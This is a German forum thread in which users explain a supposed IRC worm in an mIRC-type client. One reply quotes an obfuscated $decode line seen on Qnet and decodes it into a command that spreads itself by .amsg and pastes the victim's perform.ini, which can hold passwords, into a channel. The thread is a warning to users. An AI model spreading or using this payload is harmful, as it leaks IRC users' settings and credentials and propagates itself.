Wurm in IRC?

Das ist kein Wurm/Virus in dem Sinne, das ist einfach ein Script was du gestartet
hast - du bist hier das Übel ;)

Lösch das gIRC und install es neu, ist das einfachste.

Und dann halte dich von $decode Zeilen fern.

Die letzte $decode "Verarsche", die ich im Qnet gesehen habe war:
Code:
17:55 <@Schnittlauch> LOL! $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)

Was macht das Ding?
$findfile(.,*,1,scid -at1 .amsg LOL! $!cb(1) | .play #ý perform.ini)

Eben wie du selber geschildert hast - sich per amsg verbreiten und die
perform.ini in einen Channel pasten.

Kein Virenscanner wird da anschlagen.

MfG JM
 
Zuletzt bearbeitet:
Original geschrieben von DennyHilFe
Ausgabe laut Gamer.IrC:
* You are not on a channel

Hast du die Zeile auch mit den zwei Schrägstrichen am Anfang eingegeben?

MasterJM: Das ist aber kein resistenter 'Wurm' - ist nur für den Moment der Eingabe da und danach weg, da er sich nicht irgendwie in eine Datei schreibt und diese als Script lädt. (Ja, ich weiß dass du das weißt :) )
 
Zurück